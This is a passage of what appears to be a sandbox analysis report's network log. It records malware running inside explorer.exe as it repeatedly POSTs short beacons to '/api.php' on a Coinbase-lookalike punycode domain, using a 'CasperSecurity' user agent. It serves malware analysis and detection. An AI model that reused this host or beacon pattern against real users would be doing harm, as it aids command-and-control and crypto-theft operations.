                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                25192.168.2.449785188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:36.852022886 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:36.857055902 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:37.582874060 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:37 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCkBKnLvV82G7nFRv1YKMdHB2GlwtKOXk80dj0TxgdhI8iSSkXTn8FvS7r9L8RCXLEw2%2BAdpYqO0c8g1Cnin0kuMcc8PY%2FvoR3Z9c1N7KUbo3KXjo%2BafN9sBMAgVAu4%2FIWPbv3kjfLBZ3%2B8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f21ebf142e1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                26192.168.2.449786188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:37.697215080 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:37.705058098 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:38.399193048 CEST631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:38 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YX7g%2F1KFo3BS08Kbx8J%2F%2FvI9NUhljP4zM82SPI%2BX7RHuZ6%2FvnHKwvw4%2BtGMoG8pu0%2BA4S6wegFwxqyejKIF%2FdGcSxM1dt4dD2y0rze68C3vd2OhvNJ%2FgT7LkCSxl3OkJQBKOzYXCr%2FOuLZc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f273c59c3ff-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                27192.168.2.449788188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:38.523776054 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:38.528986931 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:39.268532991 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:39 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWrvsuuaCI%2FqVzSjyStQWJLwZ6mDeIYrClXowewpqiHK0Glkmee%2BUCa2IM0M84HwNutnU0w3r2EbNwMGKQMGoh9fO%2FztnfT5MnmK1jYGGH6FnkWBF%2BDxNjqZGEH9SPMHyoOamwAQ8%2BbXizY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f2c69980cac-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                28192.168.2.449789188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:39.422769070 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:39.429249048 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:40.121005058 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:40 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpOPQHjyhYiPz5g3mFBc1fYbwyseD58JZRkui5vMeKsEd603X0pIBaVv%2BoBXzJhrZQzSQ%2FYQ19%2FPyOy4Vu19iGy1945EP2cQTfMh3FOCuTs2j3BD1ZlTaUbTZNnVwGRqoOengCjZuP9jNW4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f31ea825e6e-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                29192.168.2.449790188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:40.242398024 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:40.247250080 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:41.062048912 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:41 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bp5pszUMlCC83299P%2FgUJNjWd48aEeDu7VJ3GfS113dS4vtvov20iNrnCBWYKtwHDqORtCiVeGH6%2BbWS2119bDTAXFJf7x7EOlxQ6gWvdr8h0V5w3hPFELCV%2BrK2JNjt9G4NL8DVJuE1pdk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f373bfe426b-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                30192.168.2.449791188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:41.186031103 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:41.194437027 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:43.073749065 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:42 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KTDCPMdlFPrccNtPZPo%2FEpJPMYYJLN9RUceU%2BNztDs6TSHVMpDtVHHaKFxhUvi7PgAE2XKfl44NvF6mSiWL0%2FJEX3m706xQCjIikUyTehKriifpA0jKsY%2FRLSXMDjbAR%2BcoALeHOrU7VfjI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f3d0afe428b-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                Jul 6, 2024 13:27:43.295994997 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:42 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KTDCPMdlFPrccNtPZPo%2FEpJPMYYJLN9RUceU%2BNztDs6TSHVMpDtVHHaKFxhUvi7PgAE2XKfl44NvF6mSiWL0%2FJEX3m706xQCjIikUyTehKriifpA0jKsY%2FRLSXMDjbAR%2BcoALeHOrU7VfjI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f3d0afe428b-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                31192.168.2.449792188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:43.297660112 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:43.317035913 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.078346014 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:44 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyDBLAnA5pMnNc7wmoRm58YcLJ6XH2rm6%2BOWX%2F3hGx0zLSSr4Zrcprf8YG9S%2B%2F9Wdjv6X3HC9dV4djmzhcz9raCWBzBzWrjy4QmCu9zJo6%2FnvAqJYjAZ%2BSNlj5j7q9zerZSedQu0CivbJ1Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f4a48de9e02-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                32192.168.2.449793188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.196265936 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.201091051 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.047868967 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:44 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aavehtfGwrkeZOer0eBm41sY4gHObrgT7PrLeeFvpHt1ITf%2FNTbOmk%2BYfCHfJ7EZv5JLxSGyRurStpeBZCJuRV%2FKlv1fQoJblgt2lZGLq19sYP22xUeEImm4TG9QGrJqIIyC6cLSn0CO8R0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f4fdc49c459-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                33192.168.2.449795188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.171914101 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.176906109 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.972578049 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:45 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=taB3vf0KDc1LZSAbYC%2BUSqtyLRGWs4a4uL%2B%2FMpU7zyZ3NvyZL8AI3cGu0SxtDiXZpzEgraXzEz4eK4eMzZPsVY6%2FaKYEfk3gF8tYKxr9idwSZ8fmoPSJcoif3g5ygJJNN%2Bt%2BSfLy7jrLbvM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f55efa50cc6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                34192.168.2.449796188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.086304903 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.091159105 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.778719902 CEST631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:47 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezz5iXtxJCOhNkFe3%2FkO%2FUvENmrJS3IBUbIAhjaf%2Bj7bSxRK4UcgOYqBaJmISI0iN%2BVLQ71L1obAurqJjMnnfw5saH%2Fpks%2Fn3NcXC%2FgfC%2BGabX1%2BSMe7O%2Fi8p5q6JthQxf1a6zG231SaGNM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f5b992f4333-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.779829025 CEST631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:47 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezz5iXtxJCOhNkFe3%2FkO%2FUvENmrJS3IBUbIAhjaf%2Bj7bSxRK4UcgOYqBaJmISI0iN%2BVLQ71L1obAurqJjMnnfw5saH%2Fpks%2Fn3NcXC%2FgfC%2BGabX1%2BSMe7O%2Fi8p5q6JthQxf1a6zG231SaGNM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f5b992f4333-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.780510902 CEST631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:47 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezz5iXtxJCOhNkFe3%2FkO%2FUvENmrJS3IBUbIAhjaf%2Bj7bSxRK4UcgOYqBaJmISI0iN%2BVLQ71L1obAurqJjMnnfw5saH%2Fpks%2Fn3NcXC%2FgfC%2BGabX1%2BSMe7O%2Fi8p5q6JthQxf1a6zG231SaGNM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f5b992f4333-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                35192.168.2.449798188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.899039984 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.903901100 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.763068914 CEST627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjYPCu5%2BZW3SpsWRnO5GCAbp6SYf%2F19NN6VRAP77oILR%2B%2FP1eptWh%2FysSKuyDlN8D5Fp2iyJkA0%2FXTIEdfazsB0%2BcQ1nXHRMcv2EVfENy5bo%2BpsSu2wFht9msKNIVnV2uRuxsJzwZhwnjE0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f6d4e7342d2-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                36192.168.2.449799188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.884185076 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.890827894 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.598746061 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:50 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
